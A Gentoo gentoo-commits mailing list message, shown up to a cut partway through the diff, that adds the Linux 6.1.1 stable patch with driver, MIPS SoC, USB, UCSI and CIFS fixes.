  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2022-12-21 19:05 UTC (permalink / raw
  To: gentoo-commits

commit:     d9693e00e43bce95a9104cba1f4e710ba0918f36
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Dec 21 18:56:47 2022 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Dec 21 18:57:43 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d9693e00

Linux patch 6.1.1

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |    4 +
 1000_linux-6.1.1.patch | 1127 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 1131 insertions(+)

diff --git a/0000_README b/0000_README
index acaedd58..d85dd44f 100644
--- a/0000_README
+++ b/0000_README
@@ -43,6 +43,10 @@ EXPERIMENTAL
 Individual Patch Descriptions:
 --------------------------------------------------------------------------
 
+Patch:  1000_linux-6.1.1.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.1
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1000_linux-6.1.1.patch b/1000_linux-6.1.1.patch
new file mode 100644
index 00000000..391da5ed
--- /dev/null
+++ b/1000_linux-6.1.1.patch
@@ -0,0 +1,1127 @@
+diff --git a/Documentation/security/keys/trusted-encrypted.rst b/Documentation/security/keys/trusted-encrypted.rst
+index 0bfb4c3397489..9bc9db8ec6517 100644
+--- a/Documentation/security/keys/trusted-encrypted.rst
++++ b/Documentation/security/keys/trusted-encrypted.rst
+@@ -350,7 +350,8 @@ Load an encrypted key "evm" from saved blob::
+ 
+ Instantiate an encrypted key "evm" using user-provided decrypted data::
+ 
+-    $ keyctl add encrypted evm "new default user:kmk 32 `cat evm_decrypted_data.blob`" @u
++    $ evmkey=$(dd if=/dev/urandom bs=1 count=32 | xxd -c32 -p)
++    $ keyctl add encrypted evm "new default user:kmk 32 $evmkey" @u
+     794890253
+ 
+     $ keyctl print 794890253
+diff --git a/Makefile b/Makefile
+index 997b677222920..7307ae6c2ef72 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 0
++SUBLEVEL = 1
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/mips/include/asm/mach-ralink/mt7621.h b/arch/mips/include/asm/mach-ralink/mt7621.h
+index 6bbf082dd149e..79d5bb0e06d63 100644
+--- a/arch/mips/include/asm/mach-ralink/mt7621.h
++++ b/arch/mips/include/asm/mach-ralink/mt7621.h
+@@ -7,10 +7,12 @@
+ #ifndef _MT7621_REGS_H_
+ #define _MT7621_REGS_H_
+ 
++#define IOMEM(x)			((void __iomem *)(KSEG1ADDR(x)))
++
+ #define MT7621_PALMBUS_BASE		0x1C000000
+ #define MT7621_PALMBUS_SIZE		0x03FFFFFF
+ 
+-#define MT7621_SYSC_BASE		0x1E000000
++#define MT7621_SYSC_BASE		IOMEM(0x1E000000)
+ 
+ #define SYSC_REG_CHIP_NAME0		0x00
+ #define SYSC_REG_CHIP_NAME1		0x04
+diff --git a/arch/mips/ralink/mt7621.c b/arch/mips/ralink/mt7621.c
+index fb0565bc34fda..bbf5811afbf2c 100644
+--- a/arch/mips/ralink/mt7621.c
++++ b/arch/mips/ralink/mt7621.c
+@@ -25,6 +25,7 @@
+ #define MT7621_MEM_TEST_PATTERN         0xaa5555aa
+ 
+ static u32 detect_magic __initdata;
++static struct ralink_soc_info *soc_info_ptr;
+ 
+ int pcibios_root_bridge_prepare(struct pci_host_bridge *bridge)
+ {
+@@ -97,41 +98,83 @@ void __init ralink_of_remap(void)
+ 		panic("Failed to remap core resources");
+ }
+ 
+-static void soc_dev_init(struct ralink_soc_info *soc_info, u32 rev)
++static unsigned int __init mt7621_get_soc_name0(void)
++{
++	return __raw_readl(MT7621_SYSC_BASE + SYSC_REG_CHIP_NAME0);
++}
++
++static unsigned int __init mt7621_get_soc_name1(void)
++{
++	return __raw_readl(MT7621_SYSC_BASE + SYSC_REG_CHIP_NAME1);
++}
++
++static bool __init mt7621_soc_valid(void)
++{
++	if (mt7621_get_soc_name0() == MT7621_CHIP_NAME0 &&
++			mt7621_get_soc_name1() == MT7621_CHIP_NAME1)
++		return true;
++	else
++		return false;
++}
++
++static const char __init *mt7621_get_soc_id(void)
++{
++	if (mt7621_soc_valid())
++		return "MT7621";
++	else
++		return "invalid";
++}
++
++static unsigned int __init mt7621_get_soc_rev(void)
++{
++	return __raw_readl(MT7621_SYSC_BASE + SYSC_REG_CHIP_REV);
++}
++
++static unsigned int __init mt7621_get_soc_ver(void)
++{
++	return (mt7621_get_soc_rev() >> CHIP_REV_VER_SHIFT) & CHIP_REV_VER_MASK;
++}
++
++static unsigned int __init mt7621_get_soc_eco(void)
++{
++	return (mt7621_get_soc_rev() & CHIP_REV_ECO_MASK);
++}
++
++static const char __init *mt7621_get_soc_revision(void)
++{
++	if (mt7621_get_soc_rev() == 1 && mt7621_get_soc_eco() == 1)
++		return "E2";
++	else
++		return "E1";
++}
++
++static int __init mt7621_soc_dev_init(void)
+ {
+ 	struct soc_device *soc_dev;
+ 	struct soc_device_attribute *soc_dev_attr;
+ 
+ 	soc_dev_attr = kzalloc(sizeof(*soc_dev_attr), GFP_KERNEL);
+ 	if (!soc_dev_attr)
+-		return;
++		return -ENOMEM;
+ 
+ 	soc_dev_attr->soc_id = "mt7621";
+ 	soc_dev_attr->family = "Ralink";
++	soc_dev_attr->revision = mt7621_get_soc_revision();
+ 
+-	if (((rev >> CHIP_REV_VER_SHIFT) & CHIP_REV_VER_MASK) == 1 &&
+-	    (rev & CHIP_REV_ECO_MASK) == 1)
+-		soc_dev_attr->revision = "E2";
+-	else
+-		soc_dev_attr->revision = "E1";
+-
+-	soc_dev_attr->data = soc_info;
++	soc_dev_attr->data = soc_info_ptr;
+ 
+ 	soc_dev = soc_device_register(soc_dev_attr);
+ 	if (IS_ERR(soc_dev)) {
+ 		kfree(soc_dev_attr);
+-		return;
++		return PTR_ERR(soc_dev);
+ 	}
++
++	return 0;
+ }
++device_initcall(mt7621_soc_dev_init);
+ 
+ void __init prom_soc_init(struct ralink_soc_info *soc_info)
+ {
+-	void __iomem *sysc = (void __iomem *) KSEG1ADDR(MT7621_SYSC_BASE);
+-	unsigned char *name = NULL;
+-	u32 n0;
+-	u32 n1;
+-	u32 rev;
+-
+ 	/* Early detection of CMP support */
+ 	mips_cm_probe();
+ 	mips_cpc_probe();
+@@ -154,27 +197,23 @@ void __init prom_soc_init(struct ralink_soc_info *soc_info)
+ 		__sync();
+ 	}
+ 
+-	n0 = __raw_readl(sysc + SYSC_REG_CHIP_NAME0);
+-	n1 = __raw_readl(sysc + SYSC_REG_CHIP_NAME1);
+-
+-	if (n0 == MT7621_CHIP_NAME0 && n1 == MT7621_CHIP_NAME1) {
+-		name = "MT7621";
++	if (mt7621_soc_valid())
+ 		soc_info->compatible = "mediatek,mt7621-soc";
+-	} else {
+-		panic("mt7621: unknown SoC, n0:%08x n1:%08x\n", n0, n1);
+-	}
++	else
++		panic("mt7621: unknown SoC, n0:%08x n1:%08x\n",
++				mt7621_get_soc_name0(),
++				mt7621_get_soc_name1());
+ 	ralink_soc = MT762X_SOC_MT7621AT;
+-	rev = __raw_readl(sysc + SYSC_REG_CHIP_REV);
+ 
+ 	snprintf(soc_info->sys_type, RAMIPS_SYS_TYPE_LEN,
+ 		"MediaTek %s ver:%u eco:%u",
+-		name,
+-		(rev >> CHIP_REV_VER_SHIFT) & CHIP_REV_VER_MASK,
+-		(rev & CHIP_REV_ECO_MASK));
++		mt7621_get_soc_id(),
++		mt7621_get_soc_ver(),
++		mt7621_get_soc_eco());
+ 
+ 	soc_info->mem_detect = mt7621_memory_detect;
+ 
+-	soc_dev_init(soc_info, rev);
++	soc_info_ptr = soc_info;
+ 
+ 	if (!register_cps_smp_ops())
+ 		return;
+diff --git a/arch/x86/entry/vdso/vdso.lds.S b/arch/x86/entry/vdso/vdso.lds.S
+index 4bf48462fca7a..e8c60ae7a7c83 100644
+--- a/arch/x86/entry/vdso/vdso.lds.S
++++ b/arch/x86/entry/vdso/vdso.lds.S
+@@ -27,7 +27,9 @@ VERSION {
+ 		__vdso_time;
+ 		clock_getres;
+ 		__vdso_clock_getres;
++#ifdef CONFIG_X86_SGX
+ 		__vdso_sgx_enter_enclave;
++#endif
+ 	local: *;
+ 	};
+ }
+diff --git a/drivers/irqchip/irq-ls-extirq.c b/drivers/irqchip/irq-ls-extirq.c
+index d8d48b1f7c29d..139f26b0a6ef8 100644
+--- a/drivers/irqchip/irq-ls-extirq.c
++++ b/drivers/irqchip/irq-ls-extirq.c
+@@ -203,7 +203,7 @@ ls_extirq_of_init(struct device_node *node, struct device_node *parent)
+ 	if (ret)
+ 		goto err_parse_map;
+ 
+-	priv->big_endian = of_device_is_big_endian(parent);
++	priv->big_endian = of_device_is_big_endian(node->parent);
+ 	priv->is_ls1021a_or_ls1043a = of_device_is_compatible(node, "fsl,ls1021a-extirq") ||
+ 				      of_device_is_compatible(node, "fsl,ls1043a-extirq");
+ 	raw_spin_lock_init(&priv->lock);
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index f8e32833226c1..473158c09f1d7 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -7521,7 +7521,7 @@ static void igb_vf_reset_msg(struct igb_adapter *adapter, u32 vf)
+ {
+ 	struct e1000_hw *hw = &adapter->hw;
+ 	unsigned char *vf_mac = adapter->vf_data[vf].vf_mac_addresses;
+-	u32 reg, msgbuf[3];
++	u32 reg, msgbuf[3] = {};
+ 	u8 *addr = (u8 *)(&msgbuf[1]);
+ 
+ 	/* process all the same items cleared in a function level reset */
+diff --git a/drivers/pci/controller/pcie-mt7621.c b/drivers/pci/controller/pcie-mt7621.c
+index 4bd1abf26008f..ee7aad09d6277 100644
+--- a/drivers/pci/controller/pcie-mt7621.c
++++ b/drivers/pci/controller/pcie-mt7621.c
+@@ -466,7 +466,8 @@ static int mt7621_pcie_register_host(struct pci_host_bridge *host)
+ }
+ 
+ static const struct soc_device_attribute mt7621_pcie_quirks_match[] = {
+-	{ .soc_id = "mt7621", .revision = "E2" }
++	{ .soc_id = "mt7621", .revision = "E2" },
++	{ /* sentinel */ }
+ };
+ 
+ static int mt7621_pcie_probe(struct platform_device *pdev)
+diff --git a/drivers/staging/r8188eu/core/rtw_led.c b/drivers/staging/r8188eu/core/rtw_led.c
+index 1e316e6358ea2..48c5db69929c3 100644
+--- a/drivers/staging/r8188eu/core/rtw_led.c
++++ b/drivers/staging/r8188eu/core/rtw_led.c
+@@ -32,40 +32,19 @@ static void ResetLedStatus(struct led_priv *pLed)
+ 
+ static void SwLedOn(struct adapter *padapter, struct led_priv *pLed)
+ {
+-	u8	LedCfg;
+-	int res;
+-
+ 	if (padapter->bDriverStopped)
+ 		return;
+ 
+-	res = rtw_read8(padapter, REG_LEDCFG2, &LedCfg);
+-	if (res)
+-		return;
+-
+-	rtw_write8(padapter, REG_LEDCFG2, (LedCfg & 0xf0) | BIT(5) | BIT(6)); /*  SW control led0 on. */
++	rtw_write8(padapter, REG_LEDCFG2, BIT(5)); /*  SW control led0 on. */
+ 	pLed->bLedOn = true;
+ }
+ 
+ static void SwLedOff(struct adapter *padapter, struct led_priv *pLed)
+ {
+-	u8	LedCfg;
+-	int res;
+-
+ 	if (padapter->bDriverStopped)
+ 		goto exit;
+ 
+-	res = rtw_read8(padapter, REG_LEDCFG2, &LedCfg);/* 0x4E */
+-	if (res)
+-		goto exit;
+-
+-	LedCfg &= 0x90; /*  Set to software control. */
+-	rtw_write8(padapter, REG_LEDCFG2, (LedCfg | BIT(3)));
+-	res = rtw_read8(padapter, REG_MAC_PINMUX_CFG, &LedCfg);
+-	if (res)
+-		goto exit;
+-
+-	LedCfg &= 0xFE;
+-	rtw_write8(padapter, REG_MAC_PINMUX_CFG, LedCfg);
++	rtw_write8(padapter, REG_LEDCFG2, BIT(5) | BIT(3));
+ exit:
+ 	pLed->bLedOn = false;
+ }
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index fb14511b1e10f..89c9ab2b19f85 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -45,7 +45,7 @@
+ #define PCI_DEVICE_ID_INTEL_ADLN		0x465e
+ #define PCI_DEVICE_ID_INTEL_ADLN_PCH		0x54ee
+ #define PCI_DEVICE_ID_INTEL_ADLS		0x7ae1
+-#define PCI_DEVICE_ID_INTEL_RPL			0x460e
++#define PCI_DEVICE_ID_INTEL_RPL			0xa70e
+ #define PCI_DEVICE_ID_INTEL_RPLS		0x7a61
+ #define PCI_DEVICE_ID_INTEL_MTLP		0x7ec1
+ #define PCI_DEVICE_ID_INTEL_MTL			0x7e7e
+diff --git a/drivers/usb/gadget/function/f_uvc.c b/drivers/usb/gadget/function/f_uvc.c
+index 6e196e06181ec..4419b7972e78f 100644
+--- a/drivers/usb/gadget/function/f_uvc.c
++++ b/drivers/usb/gadget/function/f_uvc.c
+@@ -216,8 +216,9 @@ uvc_function_ep0_complete(struct usb_ep *ep, struct usb_request *req)
+ 
+ 		memset(&v4l2_event, 0, sizeof(v4l2_event));
+ 		v4l2_event.type = UVC_EVENT_DATA;
+-		uvc_event->data.length = req->actual;
+-		memcpy(&uvc_event->data.data, req->buf, req->actual);
++		uvc_event->data.length = min_t(unsigned int, req->actual,
++			sizeof(uvc_event->data.data));
++		memcpy(&uvc_event->data.data, req->buf, uvc_event->data.length);
+ 		v4l2_event_queue(&uvc->vdev, &v4l2_event);
+ 	}
+ }
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 7bccbe50bab15..f98cf30a3c1a5 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -59,6 +59,7 @@
+ #define PCI_DEVICE_ID_INTEL_TIGER_LAKE_XHCI		0x9a13
+ #define PCI_DEVICE_ID_INTEL_MAPLE_RIDGE_XHCI		0x1138
+ #define PCI_DEVICE_ID_INTEL_ALDER_LAKE_PCH_XHCI		0x51ed
++#define PCI_DEVICE_ID_INTEL_ALDER_LAKE_N_PCH_XHCI	0x54ed
+ 
+ #define PCI_DEVICE_ID_AMD_RENOIR_XHCI			0x1639
+ #define PCI_DEVICE_ID_AMD_PROMONTORYA_4			0x43b9
+@@ -246,7 +247,8 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 		xhci->quirks |= XHCI_MISSING_CAS;
+ 
+ 	if (pdev->vendor == PCI_VENDOR_ID_INTEL &&
+-	    pdev->device == PCI_DEVICE_ID_INTEL_ALDER_LAKE_PCH_XHCI)
++	    (pdev->device == PCI_DEVICE_ID_INTEL_ALDER_LAKE_PCH_XHCI ||
++	     pdev->device == PCI_DEVICE_ID_INTEL_ALDER_LAKE_N_PCH_XHCI))
+ 		xhci->quirks |= XHCI_RESET_TO_DEFAULT;
+ 
+ 	if (pdev->vendor == PCI_VENDOR_ID_INTEL &&
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index 3bcec419f4632..f6fb23620e87a 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -195,6 +195,8 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x16DC, 0x0015) }, /* W-IE-NE-R Plein & Baus GmbH CML Control, Monitoring and Data Logger */
+ 	{ USB_DEVICE(0x17A8, 0x0001) }, /* Kamstrup Optical Eye/3-wire */
+ 	{ USB_DEVICE(0x17A8, 0x0005) }, /* Kamstrup M-Bus Master MultiPort 250D */
++	{ USB_DEVICE(0x17A8, 0x0011) }, /* Kamstrup 444 MHz RF sniffer */
++	{ USB_DEVICE(0x17A8, 0x0013) }, /* Kamstrup 870 MHz RF sniffer */
+ 	{ USB_DEVICE(0x17A8, 0x0101) }, /* Kamstrup 868 MHz wM-Bus C-Mode Meter Reader (Int Ant) */
+ 	{ USB_DEVICE(0x17A8, 0x0102) }, /* Kamstrup 868 MHz wM-Bus C-Mode Meter Reader (Ext Ant) */
+ 	{ USB_DEVICE(0x17F4, 0xAAAA) }, /* Wavesense Jazz blood glucose meter */
+diff --git a/drivers/usb/serial/f81232.c b/drivers/usb/serial/f81232.c
+index 2dd58cd9f0ccb..891fb1fe69df7 100644
+--- a/drivers/usb/serial/f81232.c
++++ b/drivers/usb/serial/f81232.c
+@@ -130,9 +130,6 @@ static u8 const clock_table[] = { F81232_CLK_1_846_MHZ, F81232_CLK_14_77_MHZ,
+ 
+ static int calc_baud_divisor(speed_t baudrate, speed_t clockrate)
+ {
+-	if (!baudrate)
+-		return 0;
+-
+ 	return DIV_ROUND_CLOSEST(clockrate, baudrate);
+ }
+ 
+@@ -498,9 +495,14 @@ static void f81232_set_baudrate(struct tty_struct *tty,
+ 	speed_t baud_list[] = { baudrate, old_baudrate, F81232_DEF_BAUDRATE };
+ 
+ 	for (i = 0; i < ARRAY_SIZE(baud_list); ++i) {
+-		idx = f81232_find_clk(baud_list[i]);
++		baudrate = baud_list[i];
++		if (baudrate == 0) {
++			tty_encode_baud_rate(tty, 0, 0);
++			return;
++		}
++
++		idx = f81232_find_clk(baudrate);
+ 		if (idx >= 0) {
+-			baudrate = baud_list[i];
+ 			tty_encode_baud_rate(tty, baudrate, baudrate);
+ 			break;
+ 		}
+diff --git a/drivers/usb/serial/f81534.c b/drivers/usb/serial/f81534.c
+index ddfcd72eb0ae7..4083ae961be43 100644
+--- a/drivers/usb/serial/f81534.c
++++ b/drivers/usb/serial/f81534.c
+@@ -536,9 +536,6 @@ static int f81534_submit_writer(struct usb_serial_port *port, gfp_t mem_flags)
+ 
+ static u32 f81534_calc_baud_divisor(u32 baudrate, u32 clockrate)
+ {
+-	if (!baudrate)
+-		return 0;
+-
+ 	/* Round to nearest divisor */
+ 	return DIV_ROUND_CLOSEST(clockrate, baudrate);
+ }
+@@ -568,9 +565,14 @@ static int f81534_set_port_config(struct usb_serial_port *port,
+ 	u32 baud_list[] = {baudrate, old_baudrate, F81534_DEFAULT_BAUD_RATE};
+ 
+ 	for (i = 0; i < ARRAY_SIZE(baud_list); ++i) {
+-		idx = f81534_find_clk(baud_list[i]);
++		baudrate = baud_list[i];
++		if (baudrate == 0) {
++			tty_encode_baud_rate(tty, 0, 0);
++			return 0;
++		}
++
++		idx = f81534_find_clk(baudrate);
+ 		if (idx >= 0) {
+-			baudrate = baud_list[i];
+ 			tty_encode_baud_rate(tty, baudrate, baudrate);
+ 			break;
+ 		}
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index c3b7f1d98e781..dee79c7d82d5c 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -255,6 +255,7 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_EP06			0x0306
+ #define QUECTEL_PRODUCT_EM05G			0x030a
+ #define QUECTEL_PRODUCT_EM060K			0x030b
++#define QUECTEL_PRODUCT_EM05G_SG		0x0311
+ #define QUECTEL_PRODUCT_EM12			0x0512
+ #define QUECTEL_PRODUCT_RM500Q			0x0800
+ #define QUECTEL_PRODUCT_RM520N			0x0801
+@@ -1160,6 +1161,8 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EP06, 0xff, 0, 0) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G, 0xff),
+ 	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_SG, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x40) },
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index a7987fc764cc6..eabe519013e78 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1270,8 +1270,9 @@ err:
+ 	return ret;
+ }
+ 
+-int ucsi_resume(struct ucsi *ucsi)
++static void ucsi_resume_work(struct work_struct *work)
+ {
++	struct ucsi *ucsi = container_of(work, struct ucsi, resume_work);
+ 	struct ucsi_connector *con;
+ 	u64 command;
+ 	int ret;
+@@ -1279,15 +1280,21 @@ int ucsi_resume(struct ucsi *ucsi)
+ 	/* Restore UCSI notification enable mask after system resume */
+ 	command = UCSI_SET_NOTIFICATION_ENABLE | ucsi->ntfy;
+ 	ret = ucsi_send_command(ucsi, command, NULL, 0);
+-	if (ret < 0)
+-		return ret;
++	if (ret < 0) {
++		dev_err(ucsi->dev, "failed to re-enable notifications (%d)\n", ret);
++		return;
++	}
+ 
+ 	for (con = ucsi->connector; con->port; con++) {
+ 		mutex_lock(&con->lock);
+-		ucsi_check_connection(con);
++		ucsi_partner_task(con, ucsi_check_connection, 1, 0);
+ 		mutex_unlock(&con->lock);
+ 	}
++}
+ 
++int ucsi_resume(struct ucsi *ucsi)
++{
++	queue_work(system_long_wq, &ucsi->resume_work);
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(ucsi_resume);
+@@ -1347,6 +1354,7 @@ struct ucsi *ucsi_create(struct device *dev, const struct ucsi_operations *ops)
+ 	if (!ucsi)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	INIT_WORK(&ucsi->resume_work, ucsi_resume_work);
+ 	INIT_DELAYED_WORK(&ucsi->work, ucsi_init_work);
+ 	mutex_init(&ucsi->ppm_lock);
+ 	ucsi->dev = dev;
+@@ -1401,6 +1409,7 @@ void ucsi_unregister(struct ucsi *ucsi)
+ 
+ 	/* Make sure that we are not in the middle of driver initialization */
+ 	cancel_delayed_work_sync(&ucsi->work);
++	cancel_work_sync(&ucsi->resume_work);
+ 
+ 	/* Disable notifications */
+ 	ucsi->ops->async_write(ucsi, UCSI_CONTROL, &cmd, sizeof(cmd));
+diff --git a/drivers/usb/typec/ucsi/ucsi.h b/drivers/usb/typec/ucsi/ucsi.h
+index 8eb391e3e592c..c968474ee5473 100644
+--- a/drivers/usb/typec/ucsi/ucsi.h
++++ b/drivers/usb/typec/ucsi/ucsi.h
+@@ -287,6 +287,7 @@ struct ucsi {
+ 	struct ucsi_capability cap;
+ 	struct ucsi_connector *connector;
+ 
++	struct work_struct resume_work;
+ 	struct delayed_work work;
+ 	int work_count;
+ #define UCSI_ROLE_SWITCH_RETRY_PER_HZ	10
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+index 1420acf987f03..157d3c0e3cc76 100644
+--- a/fs/cifs/cifsglob.h
++++ b/fs/cifs/cifsglob.h
+@@ -13,6 +13,8 @@
+ #include <linux/in6.h>
+ #include <linux/inet.h>
+ #include <linux/slab.h>
++#include <linux/scatterlist.h>
++#include <linux/mm.h>
+ #include <linux/mempool.h>
+ #include <linux/workqueue.h>
+ #include <linux/utsname.h>
+@@ -2137,4 +2139,70 @@ static inline void move_cifs_info_to_smb2(struct smb2_file_all_info *dst, const
+ 	dst->FileNameLength = src->FileNameLength;
+ }
+ 
++static inline unsigned int cifs_get_num_sgs(const struct smb_rqst *rqst,
++					    int num_rqst,
++					    const u8 *sig)
++{
++	unsigned int len, skip;
++	unsigned int nents = 0;
++	unsigned long addr;
++	int i, j;
++
++	/* Assumes the first rqst has a transform header as the first iov.
++	 * I.e.
++	 * rqst[0].rq_iov[0]  is transform header
++	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
++	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
++	 */
++	for (i = 0; i < num_rqst; i++) {
++		/*
++		 * The first rqst has a transform header where the
++		 * first 20 bytes are not part of the encrypted blob.
++		 */
++		for (j = 0; j < rqst[i].rq_nvec; j++) {
++			struct kvec *iov = &rqst[i].rq_iov[j];
++
++			skip = (i == 0) && (j == 0) ? 20 : 0;
++			addr = (unsigned long)iov->iov_base + skip;
++			if (unlikely(is_vmalloc_addr((void *)addr))) {
++				len = iov->iov_len - skip;
++				nents += DIV_ROUND_UP(offset_in_page(addr) + len,
++						      PAGE_SIZE);
++			} else {
++				nents++;
++			}
++		}
++		nents += rqst[i].rq_npages;
++	}
++	nents += DIV_ROUND_UP(offset_in_page(sig) + SMB2_SIGNATURE_SIZE, PAGE_SIZE);
++	return nents;
++}
++
++/* We can not use the normal sg_set_buf() as we will sometimes pass a
++ * stack object as buf.
++ */
++static inline struct scatterlist *cifs_sg_set_buf(struct scatterlist *sg,
++						  const void *buf,
++						  unsigned int buflen)
++{
++	unsigned long addr = (unsigned long)buf;
++	unsigned int off = offset_in_page(addr);
++
++	addr &= PAGE_MASK;
++	if (unlikely(is_vmalloc_addr((void *)addr))) {
++		do {
++			unsigned int len = min_t(unsigned int, buflen, PAGE_SIZE - off);
++
++			sg_set_page(sg++, vmalloc_to_page((void *)addr), len, off);
++
++			off = 0;
++			addr += PAGE_SIZE;
++			buflen -= len;
++		} while (buflen);
++	} else {
++		sg_set_page(sg++, virt_to_page(addr), buflen, off);
++	}
++	return sg;
++}
++
+ #endif	/* _CIFS_GLOB_H */
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index 83e83d8beabba..eb1a0de9dd553 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -600,8 +600,8 @@ int setup_aio_ctx_iter(struct cifs_aio_ctx *ctx, struct iov_iter *iter, int rw);
+ int cifs_alloc_hash(const char *name, struct shash_desc **sdesc);
+ void cifs_free_hash(struct shash_desc **sdesc);
+ 
+-extern void rqst_page_get_length(struct smb_rqst *rqst, unsigned int page,
+-				unsigned int *len, unsigned int *offset);
++void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
++			  unsigned int *len, unsigned int *offset);
+ struct cifs_chan *
+ cifs_ses_find_chan(struct cifs_ses *ses, struct TCP_Server_Info *server);
+ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses);
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 3e68d8208cf5e..1cbecd64d697f 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1136,8 +1136,8 @@ cifs_free_hash(struct shash_desc **sdesc)
+  * @len: Where to store the length for this page:
+  * @offset: Where to store the offset for this page
+  */
+-void rqst_page_get_length(struct smb_rqst *rqst, unsigned int page,
+-				unsigned int *len, unsigned int *offset)
++void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
++			  unsigned int *len, unsigned int *offset)
+ {
+ 	*len = rqst->rq_pagesz;
+ 	*offset = (page == 0) ? rqst->rq_offset : 0;
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index bfaafd02fb1f2..b24e68b5ccd61 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -4204,69 +4204,82 @@ fill_transform_hdr(struct smb2_transform_hdr *tr_hdr, unsigned int orig_len,
+ 	memcpy(&tr_hdr->SessionId, &shdr->SessionId, 8);
+ }
+ 
+-/* We can not use the normal sg_set_buf() as we will sometimes pass a
+- * stack object as buf.
+- */
+-static inline void smb2_sg_set_buf(struct scatterlist *sg, const void *buf,
+-				   unsigned int buflen)
++static void *smb2_aead_req_alloc(struct crypto_aead *tfm, const struct smb_rqst *rqst,
++				 int num_rqst, const u8 *sig, u8 **iv,
++				 struct aead_request **req, struct scatterlist **sgl,
++				 unsigned int *num_sgs)
+ {
+-	void *addr;
+-	/*
+-	 * VMAP_STACK (at least) puts stack into the vmalloc address space
+-	 */
+-	if (is_vmalloc_addr(buf))
+-		addr = vmalloc_to_page(buf);
+-	else
+-		addr = virt_to_page(buf);
+-	sg_set_page(sg, addr, buflen, offset_in_page(buf));
++	unsigned int req_size = sizeof(**req) + crypto_aead_reqsize(tfm);
++	unsigned int iv_size = crypto_aead_ivsize(tfm);
++	unsigned int len;
++	u8 *p;
++
++	*num_sgs = cifs_get_num_sgs(rqst, num_rqst, sig);
++
++	len = iv_size;
++	len += crypto_aead_alignmask(tfm) & ~(crypto_tfm_ctx_alignment() - 1);
++	len = ALIGN(len, crypto_tfm_ctx_alignment());
++	len += req_size;
++	len = ALIGN(len, __alignof__(struct scatterlist));
++	len += *num_sgs * sizeof(**sgl);
++
++	p = kmalloc(len, GFP_ATOMIC);
++	if (!p)
++		return NULL;
++
++	*iv = (u8 *)PTR_ALIGN(p, crypto_aead_alignmask(tfm) + 1);
++	*req = (struct aead_request *)PTR_ALIGN(*iv + iv_size,
++						crypto_tfm_ctx_alignment());
